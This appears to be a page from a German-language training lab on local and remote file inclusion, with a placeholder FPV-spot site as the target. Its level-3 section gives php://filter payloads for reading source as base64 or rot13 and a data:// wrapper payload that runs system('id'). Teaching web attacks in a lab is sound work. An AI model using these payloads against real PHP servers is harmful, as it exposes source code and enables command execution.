File Inclusion

Lade beliebige Dateien vom Server – lokal (LFI) oder remote (RFI).

Level 1 Level 2 Level 3
Level 3: PHP-Wrapper (php://filter)
PHP-interne Wrapper können genutzt werden, um Dateiinhalte base64-kodiert auszulesen.
Home Über uns
Willkommen im FPV-Spot-Verzeichnis

Hier findest du die besten FPV-Spots in Deutschland.

PHP-Wrapper lesen Quelltexte aus, ohne sie auszuführen:

?level=3&page=php://filter/convert.base64-encode/resource=index.php

Ausgabe base64-dekodieren:
  echo "BASE64..." | base64 -d

Andere Wrapper:
  php://filter/read=string.rot13/resource=index.php
  data://text/plain,<?php system('id'); ?>  (wenn allow_url_include=On)